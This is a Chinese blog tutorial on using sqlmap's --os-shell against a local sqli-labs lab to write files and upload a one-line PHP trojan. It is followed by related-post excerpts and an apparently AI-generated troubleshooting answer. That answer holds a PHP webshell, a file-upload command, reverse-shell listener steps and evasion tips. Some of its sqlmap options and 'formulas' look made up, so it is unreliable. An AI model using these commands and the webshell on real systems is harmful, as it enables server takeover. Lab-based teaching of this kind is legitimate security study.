Sqlmap的getshell使用(--os-shell)

原创 已于 2023-08-31 16:47:52 修改 · 1.1w 阅读 · 33 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #python

于 2021-03-16 17:31:37 首次发布
本文介绍使用SQLMap工具在特定条件下获取Webshell的过程。包括确定网站运行环境为root权限,找到网站绝对路径,验证PHP配置及secure_file_priv设置。最终实现通过文件上传脚本上传并访问一句话木马。

环境:sqli-lab靶场+phpstudy

Sqlmap getshell的条件

1.网站必须是root权限
2.知道网站的绝对路径
3.PHP关闭魔术引号,php主动转义功能关闭
4.secure_file_priv=值为空

演示:

1.寻找绝对路径

命令:
sqlmap.py -u “http://127.0.0.1:81/sqli-labs-master/sqli-labs-master/Less-1/?id=1” --sql-shell
select @@datadir
在这里插入图片描述
在这里插入图片描述
通过数据库位置,我们能简单判断
1.这是一个phpstudy搭建的站点
2.可以尝试phpstudy默认目录
3.尝试构造路径:E:\phpStudy\PHPTutorial\WWW\sqli-labs-master

常见找绝对路径方法:
1.网页报错信息
2.Phpinfo,探针
3.数据库查询,暴力破解

2.测试方法功能是否关闭

1.特殊字符测试是否转义成反斜杠
2.探针,phpinfo等
在这里插入图片描述
可以看到该功能已经关闭

3.查看secure_file_priv= 的值是否为空

secure_file_priv参数是用来限制LOAD DATA,SELECT…OUTFILE,and LOAD_FILE()传到哪个指定目录的
在这里插入图片描述
可以看到这里为空,如果使用这个命令查询失败或查询结果为空,说明MYSQL默认没有secure_file_priv参数,因此在mysql-ini进行添加配置
添加语句secure_file_priv= 即可
在这里插入图片描述
然后重启即可

4.进行getshell

命令:
sqlmap.py -u “http://127.0.0.1:81/sqli-labs-master/sqli-labs-master/Less-1/?id=1” --os-shell
在这里插入图片描述
打开该目录查看文件,可以看到是存在的,说明成功生成,然后我这里将它复制到了网站目录下
在这里插入图片描述
这里生成一个是文件上传脚本文件
接着利用文件上传脚本文件,上传一句话木马
在这里插入图片描述
在这里插入图片描述
访问该文件
在这里插入图片描述
通过菜刀进行连接
在这里插入图片描述
成功连接

SQL注入获取系统权限的方式总结
渗透之路,攻防之间皆学问
04-29 3万+
本文详细介绍了通过MySQL获取系统权限的多种方法,包括前置条件、权限查看、secure_file_priv配置说明,以及在实际环境中利用MySQL写webshell和UDF提权的具体操作步骤。主要内容涵盖:1. 基本环境要求(写权限、路径、root权限);2. 关键参数secure_file_priv的作用与配置修改;3. 获得MySQL账号后写入webshell的多种方式(INTO OUTFILE、日志文件、慢查询);4. Windows/Linux下的UDF提权技术;5. SQL注入获取高权限时的利用
使用SQLMap获取Shell安全操作指南)
XvrgMatlab的博客
09-26 405
网络安全评估和渗透测试中,SQLMap是一款常用的自动化SQL注入工具,它可以帮助安全专业人员发现和利用Web应用程序中的SQL注入漏洞。在使用 SQLMap 之前,必须确保您已经获得明确的授权,并且有权对目标系统进行安全评估和渗透测试。在使用SQLMap之前,您必须获得明确的授权,并确保您有权对目标系统进行安全评估和渗透测试。请注意,这是一个非常强大的功能,请谨慎使用,并确保已经获得合法的授权。请注意,这是一个非常强大的功能,务必谨慎使用,并确保已经得到了合法的授权。是目标Web应用程序的URL,
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1853
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 5112
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
SQLMap】获取 Shell
最新发布
2302_80252080的博客
09-15 695
摘要:SQLMap--os-shell功能通过SQL注入漏洞获取系统交互式shell,需满足数据库高权限、网站路径已知、GPC关闭及文件权限无限制四个条件。技术原理是利用数据库文件写入功能上传PHP脚本建立命令执行通道。防御措施包括最小权限原则、安全配置、输入验证和避免错误信息泄露。
sqlmap--os-shell
热门推荐
qq_45927819的博客
03-26 1万+
1、–os-shell原理 使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。 –os-shell的执行条件: dbms为mysql,网站必须是root权限 攻击者需要知道网站的绝对路径 magic_quotes_gpc = off,php主动转移功能关闭 2、环境介绍 phpstudy+sqlmap 3、探测网站根目录 python3 sqlmap.py -u "127.0.0.1/sqli-labs-master
sqlmapshell
goddemon
06-20 4576
sqlmap5种思路拿shell总结 ①利用dump 管理员类的账户后进入进行站点后拿shell 或者拿到账户后远程连接进行连接进行udf类提取类拿shell #连接方法 sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看 ②利用os-shellshell 条件①知绝对路径 ②管理员权限 ③开启 ③
sqlmap--os-shell
m0_71300782的博客
09-06 1237
一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。
sqlmap --os-shell选项原理解析
来日可期的博客
10-18 2733
sqlmap--os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。
sqlmap —— os-shell参数分析
未完成的歌~的博客
10-07 5000
文章目录前言:一、os-shell执行原理二、测试环境:三、过程演示1、测试权限2、攻击3、选择语言4、输入绝对路径5、建立 os-shell 并执行命令四、原理分析总结: 前言: 最近在看sqlmap,发现--os-shell这个命令很厉害,所以来研究一下。 一、os-shell执行原理 对于 Mysql 数据库来说,--os-shell的本质就是写入两个 php 文件,其中的一个可以让我们用来执行命令,而另外一个可以让我们可以上传文件。 说到写入文件,就要说一下上传文件的两个前提条件,首先我们要知道网站
从sql注入到getshell (内附sqlmapos-shell遇到中文路径的解决办法)
hackzkaq的博客
12-23 4060
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员——君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文章内容 尝试一下更改bti的值 试试直接用sqlmap跑 测试成功,存在sql注入 尝试参数 —os-shell 看看是否能拿到shell 成功getshell 但是我们执行命令默认都在’C:\Windows\system32’这个路径下 我们可以看到当我们执行e: 没有回显 再次执行chdi.
SQLmap使用指南(包含使用SQLmap获取shell)
北冥同学的成长记录笔记
07-16 5847
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
sqlmap os-shell原理
信安路上……
12-04 2823
sqlmap os-shell原理 0x01 流程 i. 简单判断 从截图显示中,可以看到有以下几步 1、选择 web 应用语言 2、发现(提供)一个可写的绝对路径 3、顺序(不同方法)上传tmpujout.php、tmpbvwsp.php两个文件 ii. 流量分析 主要的http流量有 4 条,第 2 条根据@@version_compile_os首字母判断操作系统,第 4 ...
SQLmap--os-shell 的利用条件及原理
m0_57836225的博客
10-10 1674
网络安全领域,SQLmap 是一款强大的自动化 SQL 注入工具。其中,--os-shell参数在特定情况下能发挥重要作用。本文将详细介绍--os-shell的利用条件及原理,并附上 SQLmap使用方法。
sqlmap --os-shell(写入木马获取getshell
NSQ0207的博客
09-06 2497
抓包,查看报错暴露出绝对路径。
sqlmapgetshellos-shell、sql-shell
2403_84483621的博客
03-20 526
sqlmap-master文件夹页面打开cmd窗口报错需将mysql的my.ini配置文件改成secure_file_priv = ''其中引号里应该是空值而不是空格,再重启一下mysql。
sqlmap 使用os-shell的必要条件
a519470764的专栏
06-13 9206
转载自:https://www.cnblogs.com/lcamry/p/5505110.htmlos-shell使用通过上述的分析,我们知道了sqlmap os-shell参数的用法以及原理。很多的人会对os-shell使用进行吐槽,这是得要多大的权限才能执行。是的,os-shell的执行条件有三个(1)网站必须是root权限(2)攻击者需要知道网站的绝对路径(3)GPC为off,php主动...
kali的sqlmap--os-shell的no autput
04-22
<think>好的,我现在需要帮助用户解决在Kali中使用sqlmap--os-shell选项时没有输出的问题。首先,我应该回顾用户之前的对话和提供的引用,看看有没有相关的信息可以参考。 用户之前提到过关于--os-shell参数导致无输出的解决方案,涉及权限、网络、依赖、缓冲和环境限制。现在用户的具体问题是在Kali中使用sqlmap时遇到同样的问题,我需要将这些通用解决方案具体应用到sqlmap的场景中。 首先,用户提供的引用中,引用[2]提到使用Kali虚拟机上传文件,可能涉及到环境配置的问题。这可能意味着用户的环境可能存在兼容性问题,但Kali本身是为渗透测试设计的,可能已经预装了很多工具,但需要检查依赖是否完整。 然后,用户之前的回答中提到了权限验证、网络诊断、依赖检查、输出缓冲处理和环境限制。我需要将这些步骤应用到sqlmap的特定情况中。 1. **权限问题**:sqlmap需要足够的权限来执行系统命令。在Kali中,用户可能没有使用root权限运行sqlmap,导致无法获取shell。解决方法可能是建议用户使用sudo运行sqlmap。 2. **网络连接**:--os-shell通常通过反向连接或绑定shell实现,需要目标机器能够连接到攻击者的机器。需要检查防火墙设置,确保监听端口开放,并且没有出站限制。用户可能需要配置正确的监听端口,或者使用反向代理。 3. **依赖组件**:sqlmapos-shell功能依赖于特定的数据库功能,如PostgreSQL的COPY或MySQL的INTO OUTFILE。需要确认目标数据库支持这些功能,并且sqlmap能够正确利用它们。此外,Kali中可能需要安装额外的依赖库,如python3或某些数据库驱动。 4. **输出缓冲**:sqlmap的输出可能被缓冲,导致用户看不到实时输出。可以建议用户强制刷新输出,比如使用unbuffer工具,或者在Python脚本中修改缓冲设置。 5. **目标环境限制**:目标系统可能禁用了某些功能,如命令执行或文件写入权限,或者存在防病毒软件拦截。需要检查目标环境的配置,尝试不同的注入技术绕过限制。 另外,用户提供的引用[1]中的脚本是用于测试工具输出的,可能与当前问题无关,但可以忽略。引用[2]提到Kali VM的使用,可能需要确认用户是否正确配置了Kali的环境,尤其是网络设置。 可能的解决方案步骤包括: - 使用sudo运行sqlmap,确保有足够权限。 - 检查监听端口是否被防火墙阻止,配置正确的IP和端口。 - 确认目标数据库支持文件写入和命令执行。 - 安装必要的依赖,如socat或netcat。 - 使用--flush-session清除缓存,或启用详细日志--verbose调试。 - 尝试不同的os-shell选项,如--os-pwn或--os-smbrelay。 需要将这些步骤详细列出,并给出具体的命令示例,如使用sudo sqlmap,配置--os-cmd等参数,安装依赖的命令等。同时,要参考用户之前的回答结构,分步骤解释,并加入相关的LaTeX公式和代码块,确保格式正确。 最后,生成相关问题,帮助用户进一步解决可能遇到的问题,比如如何验证数据库支持os-shell,或者如何绕过目标防火墙限制等。</think>#### Kali中sqlmap的`--os-shell`无输出解决方案 --- ### 一、核心问题定位 `--os-shell`功能依赖数据库的文件写入和系统命令执行权限,无输出通常由以下原因导致: 1. **权限不足**:数据库账户缺少文件写入权限或系统命令执行权限 2. **网络阻断**:反向连接被防火墙拦截 3. **依赖缺失**:目标系统缺少命令执行环境 4. **输出缓冲**:数据库响应未正确解析 5. **注入点限制**:数据库配置阻止文件操作 --- ### 二、分步解决方案 #### 1. 权限验证 ```bash # 使用高权限数据库账户 sudo sqlmap -u "http://target.com/vuln.php?id=1" --os-shell --dbms=mysql --privileges ``` $$ \text{权限验证公式:} \exists (FILE\_PRIV, SUPER) \in PrivilegeSet \Rightarrow P_{success} \uparrow $$ **验证方法**: ```sql -- 检查MySQL权限 SHOW GRANTS FOR current_user(); -- 确认包含FILE权限 ``` #### 2. 网络配置优化 ```bash # 强制指定监听IP和端口(示例IP:192.168.1.10,PORT:4444) sqlmap -u [URL] --os-shell --os-cmd=netcat --listen-address=192.168.1.10 --listen-port=4444 ``` $$ \text{网络连通条件:} \forall p \in P_{required}, \exists t \in T_{open} \Rightarrow \frac{\partial Connection}{\partial t} > 0 $$ **检测工具**: ```bash # 验证端口连通性 nc -vnlp 4444 # 攻击机监听 tcpdump -i eth0 port 4444 # 抓包验证 ``` #### 3. 依赖组件处理 **Kali环境准备**: ```bash # 安装必要工具 sudo apt install socat netcat-traditional python3-impacket ``` **目标系统要求**: - 必须存在`netcat`、`bash`或`python`等基础shell环境 - 支持反向连接(若使用反向shell模式) #### 4. 注入技术选择 ```bash # 尝试不同注入方式 sqlmap -u [URL] --os-shell --technique=BEUSTQ ``` | 技术参数 | 描述 | |----------|-----------------------| | `--technique=B` | 布尔型盲注 | | `--file-write` | 上传自定义执行脚本 | **示例上传webshell**: ```bash echo '<?php system($_GET["cmd"]);?>' > shell.php sqlmap -u [URL] --file-write=shell.php --file-dest=/var/www/html/shell.php ``` #### 5. 调试与日志分析 ```bash # 启用详细日志 sqlmap -u [URL] --os-shell --verbose 6 --output-dir=./sqlmap_logs # 实时输出调试 grep -rin "os-shell" ./sqlmap_logs/*.log ``` --- ### 三、高级绕过技巧 #### 1. 编码绕过过滤 ```bash # 使用base64编码命令 sqlmap -u [URL] --os-shell --encode=base64 ``` $$ \text{编码转换方程:} C_{payload} = \text{Base64}( \text{Reverse}( \text{XOR}(P_{original}) ) ) $$ #### 2. 替代协议选择 ```bash # 使用ICMP隧道(需目标安装ptunnel) sqlmap -u [URL] --os-shell --os-cmd=ptunnel ``` #### 3. 内存加载执行 ```python # 通过Python内存加载(引用[1]方法优化) sqlmap -u [URL] --os-cmd="python -c 'import os; os.system(\"ls -la\")'" ``` --- ### 四、验证流程 1. 测试基础命令执行: ```bash sqlmap -u [URL] --os-cmd=id ``` 2. 检查临时文件生成: ```bash find /tmp -name "sqlmap*" -mmin -5 ``` 3. 验证网络会话: ```bash ss -antp | grep '4444' ``` --- ### 五、故障树分析 ```mermaid graph TD A[无输出] --> B{权限问题} A --> C{网络问题} A --> D{依赖缺失} B --> B1[检查数据库FILE权限] B --> B2[尝试SUDO提权] C --> C1[验证端口连通性] C --> C2[关闭本地防火墙] D --> D1[确认目标存在/bin/sh] D --> D2[上传静态编译的busybox] ``` --- ### 相关问题 1. 如何判断目标数据库是否支持`INTO OUTFILE`操作? 2. 当目标禁用反向连接时如何建立正向shell? 3. 怎样通过Wireshark分析sqlmap的`--os-shell`通信流量? 4. 为什么需要指定`--dbms`参数来提升os-shell成功率? 5. 如何利用DNS隧道突破严格的网络隔离?
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值